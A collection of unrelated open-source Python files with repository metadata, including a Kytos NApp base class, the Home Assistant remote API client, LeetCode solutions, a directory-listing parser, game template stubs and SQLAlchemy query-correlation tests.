# The unconfirmed transaction is zapped and is no longer in the wallet.
self.stop_node(0)
self.start_node(0, ["-zapwallettxes=2"])
        # tx1 is still available because it was confirmed
assert_equal(self.nodes[0].gettransaction(txid1)['txid'], txid1)
# This will raise an exception because the unconfirmed transaction has been zapped
assert_raises_rpc_error(-5, 'Invalid or non-wallet transaction id', self.nodes[0].gettransaction, txid2)
if __name__ == '__main__':
ZapWalletTXesTest().main()
|
Anfauglith/iop-hd
|
test/functional/zapwallettxes.py
|
Python
|
mit
| 3,234
|
"""Kytos Napps Module."""
import json
import os
import re
import sys
import tarfile
import urllib.request
from abc import ABCMeta, abstractmethod
from pathlib import Path
from random import randint
from threading import Event, Thread
from kytos.core.events import KytosEvent
from kytos.core.logs import NAppLog
__all__ = ('KytosNApp',)
LOG = NAppLog()
class NApp:
"""Class to represent a NApp."""
# pylint: disable=too-many-arguments
def __init__(self, username=None, name=None, version=None,
repository=None, meta=False):
self.username = username
self.name = name
self.version = version if version else 'latest'
self.repository = repository
self.meta = meta
self.description = None
self.tags = []
self.enabled = False
self.napp_dependencies = []
def __str__(self):
return "{}/{}".format(self.username, self.name)
def __repr__(self):
return f"NApp({self.username}/{self.name})"
def __hash__(self):
return hash(self.id)
def __eq__(self, other):
"""Compare username/name strings."""
return isinstance(other, self.__class__) and self.id == other.id
@property
def id(self): # pylint: disable=invalid-name
"""username/name string."""
return str(self)
@property
def uri(self):
"""Return a unique identifier of this NApp."""
version = self.version if self.version else 'latest'
if not self._has_valid_repository():
return ""
# Use the next line after Diraol fix redirect using ":" for version
# return "{}/{}:{}".format(self.repository, self.id, version)
return "{}/{}-{}".format(self.repository, self.id, version)
@property
def package_url(self):
"""Return a fully qualified URL for a NApp package."""
if not self.uri:
return ""
return "{}.napp".format(self.uri)
@classmethod
def create_from_uri(cls, uri):
"""Return a new NApp instance from an unique identifier."""
regex = r'^(((https?://|file://)(.+))/)?(.+?)/(.+?)/?(:(.+))?$'
match = re.match(regex, uri)
if not match:
return None
return cls(username=match.groups()[4],
name=match.groups()[5],
version=match.groups()[7],
repository=match.groups()[1])
@classmethod
def create_from_json(cls, filename):
"""Return a new NApp instance from a metadata file."""
with open(filename, encoding='utf-8') as data_file:
data = json.loads(data_file.read())
return cls.create_from_dict(data)
@classmethod
def create_from_dict(cls, data):
"""Return a new NApp instance from metadata."""
napp = cls()
for attribute, value in data.items():
setattr(napp, attribute, value)
return napp
def as_json(self):
"""Dump all NApp attributes on a json format."""
return json.dumps(self.__dict__)
def match(self, pattern):
"""Whether a pattern is present on NApp id, description and tags."""
try:
pattern = '.*{}.*'.format(pattern)
pattern = re.compile(pattern, re.IGNORECASE)
strings = [self.id, self.description] + self.tags
return any(pattern.match(string) for string in strings)
except TypeError:
return False
def download(self):
"""Download NApp package from his repository.
Raises:
urllib.error.HTTPError: If download is not successful.
Returns:
str: Downloaded temp filename.
"""
if not self.package_url:
return None
package_filename = urllib.request.urlretrieve(self.package_url)[0]
extracted = self._extract(package_filename)
Path(package_filename).unlink()
self._update_repo_file(extracted)
return extracted
@staticmethod
def _extract(filename):
"""Extract NApp package to a temporary folder.
Return:
pathlib.Path: Temp dir with package contents.
"""
random_string = '{:0d}'.format(randint(0, 10**6))
tmp = '/tmp/kytos-napp-' + Path(filename).stem + '-' + random_string
os.mkdir(tmp)
with tarfile.open(filename, 'r:xz') as tar:
tar.extractall(tmp)
return Path(tmp)
def _has_valid_repository(self):
"""Whether this NApp has a valid repository or not."""
return all([self.username, self.name, self.repository])
def _update_repo_file(self, destination=None):
"""Create or update the file '.repo' inside NApp package."""
with open("{}/.repo".format(destination), 'w') as repo_file:
repo_file.write(self.repository + '\n')
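# --- editorial sketch, not part of the original module ---
# Quick illustration of the URI helpers defined on NApp above. The repository
# URL below is a made-up example, not an official NApp server.
def _napp_uri_sketch():
    napp = NApp.create_from_uri("https://example.org/repo/kytos/of_core:1.0")
    print(napp.id)       # -> "kytos/of_core"
    print(napp.version)  # -> "1.0"
    print(napp.uri)      # -> "https://example.org/repo/kytos/of_core-1.0"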
class KytosNApp(Thread, metaclass=ABCMeta):
"""Base class for any KytosNApp to be developed."""
def __init__(self, controller, **kwargs):
"""Contructor of KytosNapps.
Go through all of the instance methods and selects those that have
the events attribute, then creates a dict containing the event_name
and the list of methods that are responsible for handling such event.
At the end, the setup method is called as a complement of the init
process.
"""
Thread.__init__(self, daemon=False)
self.controller = controller
self.username = None # loaded from json
self.name = None # loaded from json
self.meta = False # loaded from json
self._load_json()
# Force a listener with a private method.
self._listeners = {
'kytos/core.shutdown': [self._shutdown_handler],
'kytos/core.shutdown.' + self.napp_id: [self._shutdown_handler]}
self.__event = Event()
#: int: Seconds to sleep before next call to :meth:`execute`. If
#: negative, run :meth:`execute` only once.
self.__interval = -1
self.setup()
#: Add non-private methods that listen to events.
handler_methods = [getattr(self, method_name) for method_name in
dir(self) if method_name[0] != '_' and
callable(getattr(self, method_name)) and
hasattr(getattr(self, method_name), 'events')]
# Building the listeners dictionary
for method in handler_methods:
for event_name in method.events:
if event_name not in self._listeners:
self._listeners[event_name] = []
self._listeners[event_name].append(method)
@property
def napp_id(self):
"""username/name string."""
return "{}/{}".format(self.username, self.name)
def listeners(self):
"""Return all listeners registered."""
return list(self._listeners.keys())
def _load_json(self):
"""Update object attributes based on kytos.json."""
current_file = sys.modules[self.__class__.__module__].__file__
json_path = os.path.join(os.path.dirname(current_file), 'kytos.json')
with open(json_path, encoding='utf-8') as data_file:
data = json.loads(data_file.read())
for attribute, value in data.items():
setattr(self, attribute, value)
def execute_as_loop(self, interval):
"""Run :meth:`execute` within a loop. Call this method during setup.
By calling this method, the application does not need to worry about
loop details such as sleeping and stopping the loop when
:meth:`shutdown` is called. Just call this method during :meth:`setup`
and implement :meth:`execute` as a single execution.
Args:
interval (int): Seconds between each call to :meth:`execute`.
"""
self.__interval = interval
def run(self):
"""Call the execute method, looping as needed.
        It should not be overridden.
"""
self.notify_loaded()
LOG.info("Running NApp: %s", self)
self.execute()
while self.__interval > 0 and not self.__event.is_set():
self.__event.wait(self.__interval)
self.execute()
def notify_loaded(self):
"""Inform this NApp has been loaded."""
name = f'{self.username}/{self.name}.loaded'
event = KytosEvent(name=name, content={})
self.controller.buffers.app.put(event)
# all listeners receive event
def _shutdown_handler(self, event): # pylint: disable=unused-argument
"""Listen shutdown event from kytos.
This method listens the kytos/core.shutdown event and call the shutdown
method from napp subclass implementation.
Paramters
event (:class:`KytosEvent`): event to be listened.
"""
if not self.__event.is_set():
self.__event.set()
self.shutdown()
@abstractmethod
def setup(self):
"""Replace the 'init' method for the KytosApp subclass.
The setup method is automatically called on the NApp __init__().
Users aren't supposed to call this method directly.
"""
@abstractmethod
def execute(self):
"""Execute in a loop until 'kytos/core.shutdown' is received.
The execute method is called by KytosNApp class.
Users shouldn't call this method directly.
"""
@abstractmethod
def shutdown(self):
"""Run before the app is unloaded and the controller, stopped.
The user implementation of this method should do the necessary routine
for the user App and also it is a good moment to break the loop of the
execute method if it is in a loop.
This methods is not going to be called directly, it is going to be
called by the _shutdown_handler method when a KytosShutdownEvent is
sent.
"""
|
kytos/kytos
|
kytos/core/napps/base.py
|
Python
|
mit
| 9,959
|
#!/usr/bin/python3
import sqlite3, sys
# It takes one argument: the name of the new database
if len(sys.argv) < 2:
sys.stderr.write('You need to give the name of the ILI DB\n')
sys.exit(1)
else:
dbfile = sys.argv[1]
################################################################
# CONNECT TO DB
################################################################
con = sqlite3.connect(dbfile)
c = con.cursor()
################################################################
# USER
################################################################
u = "ili_load-kinds.py"
################################################################
# INSERT POS DATA (CODES AND NAMES)
################################################################
c.execute("""INSERT INTO kind (id, kind, u)
VALUES (?,?,?)""", [1,'concept',u])
c.execute("""INSERT INTO kind (id, kind, u)
VALUES (?,?,?)""", [2,'instance',u])
con.commit()
con.close()
sys.stderr.write('Loaded KIND data in (%s)\n' % (dbfile))
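# --- editorial sketch, not part of the original script ---
# Optional sanity check: reopen the database and list the kinds inserted
# above, using the same 'kind' table columns as the INSERT statements.
con = sqlite3.connect(dbfile)
for kid, kind in con.execute("SELECT id, kind FROM kind ORDER BY id"):
    sys.stderr.write("  kind %d = %s\n" % (kid, kind))
con.close()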
|
globalwordnet/OMW
|
scripts/load-ili-kinds.py
|
Python
|
mit
| 1,029
|
"""kaxabu URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^', include('族語辭典.網址')),
url(r'^admin/', admin.site.urls),
]
|
Taiwanese-Corpus/kaxabu-muwalak-misa-a-ahan-bizu
|
後端/kaxabu/urls.py
|
Python
|
mit
| 819
|
"""
Write an efficient algorithm that searches for a value in an m x n matrix. This matrix has the following properties:
Integers in each row are sorted from left to right.
The first integer of each row is greater than the last integer of the previous row.
For example,
Consider the following matrix:
[
[1, 3, 5, 7],
[10, 11, 16, 20],
[23, 30, 34, 50]
]
Given target = 3, return true.
"""
__author__ = 'Danyang'
class Solution:
def searchMatrix(self, matrix, target):
"""
binary search. Two exactly the same binary search algorithm
:param matrix: a list of lists of integers
:param target: an integer
:return: a boolean
"""
if not matrix:
return False
m = len(matrix)
n = len(matrix[0])
# binary search
start = 0
end = m # [0, m)
while start<end:
mid = (start+end)/2
if matrix[mid][0]==target:
return True
if target<matrix[mid][0]:
end = mid
elif target>matrix[mid][0]:
start = mid+1
        # pick the last row whose first value is <= target
        if start == 0:
            return False
        lst = matrix[start-1]
# binary search
start = 0
end = n # [0, n)
while start<end:
mid = (start+end)/2
if lst[mid]==target:
return True
if target<lst[mid]:
end = mid
elif target>lst[mid]:
start = mid+1
return False
if __name__=="__main__":
assert Solution().searchMatrix([[1], [3]], 3)==True
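    # --- editorial sketch, not part of the original solution ---
    # The same two properties also allow a single binary search over the
    # virtual flattened array of length m*n, mapping index k to
    # matrix[k // n][k % n].
    def _search_flat_sketch(matrix, target):
        if not matrix or not matrix[0]:
            return False
        m, n = len(matrix), len(matrix[0])
        lo, hi = 0, m*n
        while lo < hi:
            mid = (lo+hi)//2
            val = matrix[mid//n][mid % n]
            if val == target:
                return True
            elif val < target:
                lo = mid+1
            else:
                hi = mid
        return False
    assert _search_flat_sketch([[1, 3, 5, 7], [10, 11, 16, 20], [23, 30, 34, 50]], 3) == True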
|
dominjune/LeetCode
|
074 Search a 2D Matrix.py
|
Python
|
mit
| 1,679
|
from abc import ABCMeta, abstractmethod
from enum import Enum
class InputType(Enum):
ls = 1
dir = 2
unknown = 3
class ParserBase(metaclass=ABCMeta):
def __init__(self, input_text, extensions):
self.input = input_text.splitlines()
self.extensions = extensions
@abstractmethod
def read_directories(self):
pass
def _read_directories(self, num_word):
directory = ''
output = []
for line in self.input:
if len(line) == 0:
continue
elif line == '\n':
continue
elif self._check_if_directory(line):
directory = self._parse_directory(line)
else:
title = self._parse_line(line, num_word)
if self._check_extension(title):
output.append(directory + title)
return output
@abstractmethod
def _check_if_directory(self, line):
pass
@abstractmethod
def _parse_directory(self, line):
pass
@staticmethod
def _parse_line(line, num_word):
words = line.split(None, num_word - 1)
if len(words) < num_word:
return ''
else:
return words[num_word - 1]
def _check_extension(self, title):
if len(title) > 3 and title[-4] == '.':
for ext in self.extensions:
if title.endswith(ext):
return True
return False
class ParserLS(ParserBase):
def read_directories(self):
return self._read_directories(9)
def _check_if_directory(self, line):
return line.startswith(".")
def _parse_directory(self, line):
return line[0:-1] + '/'
class ParserDIR(ParserBase):
def __init__(self, input_text, extensions):
super(ParserDIR, self).__init__(input_text, extensions)
self.firstDir = ''
def read_directories(self):
self._set_first_dir()
return self._read_directories(4)
def _check_if_directory(self, line):
return line.startswith(" Katalog:")
def _parse_directory(self, line):
return self._parse_directory_zero(line).replace(self.firstDir, "./")
def _set_first_dir(self):
i = 0
for line in self.input:
i += 1
if i > 5:
self.firstDir = ''
return
elif self._check_if_directory(line):
self.firstDir = self._parse_directory_zero(line)
return
self.firstDir = ''
@staticmethod
def _parse_directory_zero(line):
return (line[10:] + '/').replace("\\", "/")
def recognize_file_type(input_text):
i = 0
for line in input_text.splitlines():
i += 1
if i > 5:
return InputType.unknown
elif line.startswith('total '):
return InputType.ls
elif 'Katalog:' in line:
return InputType.dir
return InputType.unknown
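# --- editorial sketch, not part of the original module ---
# Typical wiring of the pieces above: detect the listing format first, then
# hand the text to the matching parser. The extension list is an example.
def _parse_listing_sketch(listing_text, extensions=('mp3', 'ogg')):
    input_type = recognize_file_type(listing_text)
    if input_type == InputType.ls:
        parser = ParserLS(listing_text, extensions)
    elif input_type == InputType.dir:
        parser = ParserDIR(listing_text, extensions)
    else:
        return []
    return parser.read_directories()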
|
APMD/PMD
|
PMD/parser/parsers.py
|
Python
|
mit
| 2,980
|
"""
Support for an interface to work with a remote instance of Home Assistant.
If a connection error occurs while communicating with the API a
HomeAssistantError will be raised.
For more details about the Python API, please refer to the documentation at
https://home-assistant.io/developers/python_api/
"""
from datetime import datetime
import enum
import json
import logging
import threading
import urllib.parse
import requests
import homeassistant.bootstrap as bootstrap
import homeassistant.core as ha
from homeassistant.const import (
HTTP_HEADER_HA_AUTH, SERVER_PORT, URL_API, URL_API_EVENT_FORWARD,
URL_API_EVENTS, URL_API_EVENTS_EVENT, URL_API_SERVICES,
URL_API_SERVICES_SERVICE, URL_API_STATES, URL_API_STATES_ENTITY,
HTTP_HEADER_CONTENT_TYPE, CONTENT_TYPE_JSON)
from homeassistant.exceptions import HomeAssistantError
METHOD_GET = "get"
METHOD_POST = "post"
METHOD_DELETE = "delete"
_LOGGER = logging.getLogger(__name__)
class APIStatus(enum.Enum):
"""Represent API status."""
# pylint: disable=no-init,invalid-name,too-few-public-methods
OK = "ok"
INVALID_PASSWORD = "invalid_password"
CANNOT_CONNECT = "cannot_connect"
UNKNOWN = "unknown"
def __str__(self):
"""Return the state."""
return self.value
class API(object):
"""Object to pass around Home Assistant API location and credentials."""
# pylint: disable=too-few-public-methods
def __init__(self, host, api_password=None, port=None, use_ssl=False):
"""Initalize the API."""
self.host = host
self.port = port or SERVER_PORT
self.api_password = api_password
if use_ssl:
self.base_url = "https://{}:{}".format(host, self.port)
else:
self.base_url = "http://{}:{}".format(host, self.port)
self.status = None
self._headers = {
HTTP_HEADER_CONTENT_TYPE: CONTENT_TYPE_JSON,
}
if api_password is not None:
self._headers[HTTP_HEADER_HA_AUTH] = api_password
def validate_api(self, force_validate=False):
"""Test if we can communicate with the API."""
if self.status is None or force_validate:
self.status = validate_api(self)
return self.status == APIStatus.OK
def __call__(self, method, path, data=None):
"""Make a call to the Home Assistant API."""
if data is not None:
data = json.dumps(data, cls=JSONEncoder)
url = urllib.parse.urljoin(self.base_url, path)
try:
if method == METHOD_GET:
return requests.get(
url, params=data, timeout=5, headers=self._headers)
else:
return requests.request(
method, url, data=data, timeout=5, headers=self._headers)
except requests.exceptions.ConnectionError:
_LOGGER.exception("Error connecting to server")
raise HomeAssistantError("Error connecting to server")
except requests.exceptions.Timeout:
error = "Timeout when talking to {}".format(self.host)
_LOGGER.exception(error)
raise HomeAssistantError(error)
def __repr__(self):
"""Return the representation of the API."""
return "API({}, {}, {})".format(
self.host, self.api_password, self.port)
class HomeAssistant(ha.HomeAssistant):
"""Home Assistant that forwards work."""
# pylint: disable=super-init-not-called,too-many-instance-attributes
def __init__(self, remote_api, local_api=None):
"""Initalize the forward instance."""
if not remote_api.validate_api():
raise HomeAssistantError(
"Remote API at {}:{} not valid: {}".format(
remote_api.host, remote_api.port, remote_api.status))
self.remote_api = remote_api
self.pool = pool = ha.create_worker_pool()
self.bus = EventBus(remote_api, pool)
self.services = ha.ServiceRegistry(self.bus, pool)
self.states = StateMachine(self.bus, self.remote_api)
self.config = ha.Config()
self.config.api = local_api
def start(self):
"""Start the instance."""
# Ensure a local API exists to connect with remote
if 'api' not in self.config.components:
if not bootstrap.setup_component(self, 'api'):
raise HomeAssistantError(
'Unable to setup local API to receive events')
ha.create_timer(self)
self.bus.fire(ha.EVENT_HOMEASSISTANT_START,
origin=ha.EventOrigin.remote)
# Give eventlet time to startup
import eventlet
eventlet.sleep(0.1)
# Setup that events from remote_api get forwarded to local_api
# Do this after we fire START, otherwise HTTP is not started
if not connect_remote_events(self.remote_api, self.config.api):
raise HomeAssistantError((
'Could not setup event forwarding from api {} to '
'local api {}').format(self.remote_api, self.config.api))
def stop(self):
"""Stop Home Assistant and shuts down all threads."""
_LOGGER.info("Stopping")
self.bus.fire(ha.EVENT_HOMEASSISTANT_STOP,
origin=ha.EventOrigin.remote)
self.pool.stop()
# Disconnect master event forwarding
disconnect_remote_events(self.remote_api, self.config.api)
class EventBus(ha.EventBus):
"""EventBus implementation that forwards fire_event to remote API."""
# pylint: disable=too-few-public-methods
def __init__(self, api, pool=None):
"""Initalize the eventbus."""
super().__init__(pool)
self._api = api
def fire(self, event_type, event_data=None, origin=ha.EventOrigin.local):
"""Forward local events to remote target.
Handles remote event as usual.
"""
# All local events that are not TIME_CHANGED are forwarded to API
if origin == ha.EventOrigin.local and \
event_type != ha.EVENT_TIME_CHANGED:
fire_event(self._api, event_type, event_data)
else:
super().fire(event_type, event_data, origin)
class EventForwarder(object):
"""Listens for events and forwards to specified APIs."""
def __init__(self, hass, restrict_origin=None):
"""Initalize the event forwarder."""
self.hass = hass
self.restrict_origin = restrict_origin
# We use a tuple (host, port) as key to ensure
# that we do not forward to the same host twice
self._targets = {}
self._lock = threading.Lock()
def connect(self, api):
"""Attach to a Home Assistant instance and forward events.
Will overwrite old target if one exists with same host/port.
"""
with self._lock:
if len(self._targets) == 0:
# First target we get, setup listener for events
self.hass.bus.listen(ha.MATCH_ALL, self._event_listener)
key = (api.host, api.port)
self._targets[key] = api
def disconnect(self, api):
"""Remove target from being forwarded to."""
with self._lock:
key = (api.host, api.port)
did_remove = self._targets.pop(key, None) is None
if len(self._targets) == 0:
# Remove event listener if no forwarding targets present
self.hass.bus.remove_listener(ha.MATCH_ALL,
self._event_listener)
return did_remove
def _event_listener(self, event):
"""Listen and forward all events."""
with self._lock:
# We don't forward time events or, if enabled, non-local events
if event.event_type == ha.EVENT_TIME_CHANGED or \
(self.restrict_origin and event.origin != self.restrict_origin):
return
for api in self._targets.values():
fire_event(api, event.event_type, event.data)
class StateMachine(ha.StateMachine):
"""Fire set events to an API. Uses state_change events to track states."""
def __init__(self, bus, api):
"""Initalize the statemachine."""
super().__init__(None)
self._api = api
self.mirror()
bus.listen(ha.EVENT_STATE_CHANGED, self._state_changed_listener)
def remove(self, entity_id):
"""Remove the state of an entity.
Returns boolean to indicate if an entity was removed.
"""
return remove_state(self._api, entity_id)
def set(self, entity_id, new_state, attributes=None):
"""Call set_state on remote API."""
set_state(self._api, entity_id, new_state, attributes)
def mirror(self):
"""Discard current data and mirrors the remote state machine."""
self._states = {state.entity_id: state for state
in get_states(self._api)}
def _state_changed_listener(self, event):
"""Listen for state changed events and applies them."""
if event.data['new_state'] is None:
self._states.pop(event.data['entity_id'], None)
else:
self._states[event.data['entity_id']] = event.data['new_state']
class JSONEncoder(json.JSONEncoder):
"""JSONEncoder that supports Home Assistant objects."""
# pylint: disable=too-few-public-methods,method-hidden
def default(self, obj):
"""Convert Home Assistant objects.
Hand other objects to the original method.
"""
if isinstance(obj, datetime):
return obj.isoformat()
elif hasattr(obj, 'as_dict'):
return obj.as_dict()
try:
return json.JSONEncoder.default(self, obj)
except TypeError:
# If the JSON serializer couldn't serialize it
# it might be a generator, convert it to a list
try:
return [self.default(child_obj)
for child_obj in obj]
except TypeError:
# Ok, we're lost, cause the original error
return json.JSONEncoder.default(self, obj)
def validate_api(api):
"""Make a call to validate API."""
try:
req = api(METHOD_GET, URL_API)
if req.status_code == 200:
return APIStatus.OK
elif req.status_code == 401:
return APIStatus.INVALID_PASSWORD
else:
return APIStatus.UNKNOWN
except HomeAssistantError:
return APIStatus.CANNOT_CONNECT
def connect_remote_events(from_api, to_api):
"""Setup from_api to forward all events to to_api."""
data = {
'host': to_api.host,
'api_password': to_api.api_password,
'port': to_api.port
}
try:
req = from_api(METHOD_POST, URL_API_EVENT_FORWARD, data)
if req.status_code == 200:
return True
else:
_LOGGER.error(
"Error setting up event forwarding: %s - %s",
req.status_code, req.text)
return False
except HomeAssistantError:
_LOGGER.exception("Error setting up event forwarding")
return False
def disconnect_remote_events(from_api, to_api):
"""Disconnect forwarding events from from_api to to_api."""
data = {
'host': to_api.host,
'port': to_api.port
}
try:
req = from_api(METHOD_DELETE, URL_API_EVENT_FORWARD, data)
if req.status_code == 200:
return True
else:
_LOGGER.error(
"Error removing event forwarding: %s - %s",
req.status_code, req.text)
return False
except HomeAssistantError:
_LOGGER.exception("Error removing an event forwarder")
return False
def get_event_listeners(api):
"""List of events that is being listened for."""
try:
req = api(METHOD_GET, URL_API_EVENTS)
return req.json() if req.status_code == 200 else {}
except (HomeAssistantError, ValueError):
# ValueError if req.json() can't parse the json
_LOGGER.exception("Unexpected result retrieving event listeners")
return {}
def fire_event(api, event_type, data=None):
"""Fire an event at remote API."""
try:
req = api(METHOD_POST, URL_API_EVENTS_EVENT.format(event_type), data)
if req.status_code != 200:
_LOGGER.error("Error firing event: %d - %s",
req.status_code, req.text)
except HomeAssistantError:
_LOGGER.exception("Error firing event")
def get_state(api, entity_id):
"""Query given API for state of entity_id."""
try:
req = api(METHOD_GET, URL_API_STATES_ENTITY.format(entity_id))
# req.status_code == 422 if entity does not exist
return ha.State.from_dict(req.json()) \
if req.status_code == 200 else None
except (HomeAssistantError, ValueError):
# ValueError if req.json() can't parse the json
_LOGGER.exception("Error fetching state")
return None
def get_states(api):
"""Query given API for all states."""
try:
req = api(METHOD_GET,
URL_API_STATES)
return [ha.State.from_dict(item) for
item in req.json()]
except (HomeAssistantError, ValueError, AttributeError):
# ValueError if req.json() can't parse the json
_LOGGER.exception("Error fetching states")
return []
def remove_state(api, entity_id):
"""Call API to remove state for entity_id.
Return True if entity is gone (removed/never existed).
"""
try:
req = api(METHOD_DELETE, URL_API_STATES_ENTITY.format(entity_id))
if req.status_code in (200, 404):
return True
_LOGGER.error("Error removing state: %d - %s",
req.status_code, req.text)
return False
except HomeAssistantError:
_LOGGER.exception("Error removing state")
return False
def set_state(api, entity_id, new_state, attributes=None):
"""Tell API to update state for entity_id.
Return True if success.
"""
attributes = attributes or {}
data = {'state': new_state,
'attributes': attributes}
try:
req = api(METHOD_POST,
URL_API_STATES_ENTITY.format(entity_id),
data)
if req.status_code not in (200, 201):
_LOGGER.error("Error changing state: %d - %s",
req.status_code, req.text)
return False
else:
return True
except HomeAssistantError:
_LOGGER.exception("Error setting state")
return False
def is_state(api, entity_id, state):
"""Query API to see if entity_id is specified state."""
cur_state = get_state(api, entity_id)
return cur_state and cur_state.state == state
def get_services(api):
"""Return a list of dicts.
Each dict has a string "domain" and a list of strings "services".
"""
try:
req = api(METHOD_GET, URL_API_SERVICES)
return req.json() if req.status_code == 200 else {}
except (HomeAssistantError, ValueError):
# ValueError if req.json() can't parse the json
_LOGGER.exception("Got unexpected services result")
return {}
def call_service(api, domain, service, service_data=None):
"""Call a service at the remote API."""
try:
req = api(METHOD_POST,
URL_API_SERVICES_SERVICE.format(domain, service),
service_data)
if req.status_code != 200:
_LOGGER.error("Error calling service: %d - %s",
req.status_code, req.text)
except HomeAssistantError:
_LOGGER.exception("Error calling service")
|
mikaelboman/home-assistant
|
homeassistant/remote.py
|
Python
|
mit
| 15,888
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/clothing/shared_clothing_ith_backpack_field_06.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
anhstudios/swganh
|
data/scripts/templates/object/draft_schematic/clothing/shared_clothing_ith_backpack_field_06.py
|
Python
|
mit
| 468
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_dressed_imperial_officer_m_4.iff"
result.attribute_template_id = 9
result.stfName("npc_name","human_base_male")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
anhstudios/swganh
|
data/scripts/templates/object/mobile/shared_dressed_imperial_officer_m_4.py
|
Python
|
mit
| 453
|
# author: Fei Gao
#
# Integer To Roman
#
# Given an integer, convert it to a roman numeral.
# Input is guaranteed to be within the range from 1 to 3999.
class Solution:
# @return a string
def intToRoman(self, n):
roman_numeral_map = (
('M', 1000),
('CM', 900),
('D', 500),
('CD', 400),
('C', 100),
('XC', 90),
('L', 50),
('XL', 40),
('X', 10),
('IX', 9),
('V', 5),
('IV', 4),
('I', 1))
result = ''
for numeral, integer in roman_numeral_map:
while n >= integer:
result += numeral
n -= integer
return result
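# --- editorial sketch, not part of the original file ---
# A few spot checks of the greedy conversion implemented above.
assert Solution().intToRoman(1990) == 'MCMXC'
assert Solution().intToRoman(2014) == 'MMXIV'
assert Solution().intToRoman(3999) == 'MMMCMXCIX'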
def main():
solver = Solution()
tests = []
for test in tests:
print(test)
print(' ->')
result = solver.intToRoman(test)
print(result)
print('~'*10)
pass
if __name__ == '__main__':
main()
pass
|
feigaochn/leetcode
|
p12_integer_to_roman.py
|
Python
|
mit
| 1,010
|
from sqlalchemy.testing import eq_, assert_raises, assert_raises_message
import operator
from sqlalchemy import *
from sqlalchemy import exc as sa_exc, util
from sqlalchemy.sql import compiler, table, column
from sqlalchemy.engine import default
from sqlalchemy.orm import *
from sqlalchemy.orm import attributes
from sqlalchemy.testing import eq_
import sqlalchemy as sa
from sqlalchemy import testing
from sqlalchemy.testing import AssertsCompiledSQL, engines
from sqlalchemy.testing.schema import Column
from test.orm import _fixtures
from sqlalchemy.testing import fixtures
from sqlalchemy.orm.util import join, outerjoin, with_parent
class QueryTest(_fixtures.FixtureTest):
run_setup_mappers = 'once'
run_inserts = 'once'
run_deletes = None
@classmethod
def setup_mappers(cls):
Node, composite_pk_table, users, Keyword, items, Dingaling, \
order_items, item_keywords, Item, User, dingalings, \
Address, keywords, CompositePk, nodes, Order, orders, \
addresses = cls.classes.Node, \
cls.tables.composite_pk_table, cls.tables.users, \
cls.classes.Keyword, cls.tables.items, \
cls.classes.Dingaling, cls.tables.order_items, \
cls.tables.item_keywords, cls.classes.Item, \
cls.classes.User, cls.tables.dingalings, \
cls.classes.Address, cls.tables.keywords, \
cls.classes.CompositePk, cls.tables.nodes, \
cls.classes.Order, cls.tables.orders, cls.tables.addresses
mapper(User, users, properties={
'addresses':relationship(Address, backref='user', order_by=addresses.c.id),
'orders':relationship(Order, backref='user', order_by=orders.c.id), # o2m, m2o
})
mapper(Address, addresses, properties={
'dingaling':relationship(Dingaling, uselist=False, backref="address") #o2o
})
mapper(Dingaling, dingalings)
mapper(Order, orders, properties={
'items':relationship(Item, secondary=order_items, order_by=items.c.id), #m2m
'address':relationship(Address), # m2o
})
mapper(Item, items, properties={
'keywords':relationship(Keyword, secondary=item_keywords) #m2m
})
mapper(Keyword, keywords)
mapper(Node, nodes, properties={
'children':relationship(Node,
backref=backref('parent', remote_side=[nodes.c.id])
)
})
mapper(CompositePk, composite_pk_table)
configure_mappers()
class QueryCorrelatesLikeSelect(QueryTest, AssertsCompiledSQL):
query_correlated = "SELECT users.name AS users_name, " \
"(SELECT count(addresses.id) AS count_1 FROM addresses " \
"WHERE addresses.user_id = users.id) AS anon_1 FROM users"
query_not_correlated = "SELECT users.name AS users_name, " \
"(SELECT count(addresses.id) AS count_1 FROM addresses, users " \
"WHERE addresses.user_id = users.id) AS anon_1 FROM users"
def test_as_scalar_select_auto_correlate(self):
addresses, users = self.tables.addresses, self.tables.users
query = select(
[func.count(addresses.c.id)],
addresses.c.user_id==users.c.id
).as_scalar()
query = select([users.c.name.label('users_name'), query])
self.assert_compile(query, self.query_correlated,
dialect=default.DefaultDialect()
)
def test_as_scalar_select_explicit_correlate(self):
addresses, users = self.tables.addresses, self.tables.users
query = select(
[func.count(addresses.c.id)],
addresses.c.user_id==users.c.id
).correlate(users).as_scalar()
query = select([users.c.name.label('users_name'), query])
self.assert_compile(query, self.query_correlated,
dialect=default.DefaultDialect()
)
def test_as_scalar_select_correlate_off(self):
addresses, users = self.tables.addresses, self.tables.users
query = select(
[func.count(addresses.c.id)],
addresses.c.user_id==users.c.id
).correlate(None).as_scalar()
query = select([ users.c.name.label('users_name'), query])
self.assert_compile(query, self.query_not_correlated,
dialect=default.DefaultDialect()
)
def test_as_scalar_query_auto_correlate(self):
sess = create_session()
Address, User = self.classes.Address, self.classes.User
query = sess.query(func.count(Address.id))\
.filter(Address.user_id==User.id)\
.as_scalar()
query = sess.query(User.name, query)
self.assert_compile(query, self.query_correlated,
dialect=default.DefaultDialect()
)
def test_as_scalar_query_explicit_correlate(self):
sess = create_session()
Address, User = self.classes.Address, self.classes.User
query = sess.query(func.count(Address.id))\
.filter(Address.user_id==User.id)\
.correlate(self.tables.users)\
.as_scalar()
query = sess.query(User.name, query)
self.assert_compile(query, self.query_correlated,
dialect=default.DefaultDialect()
)
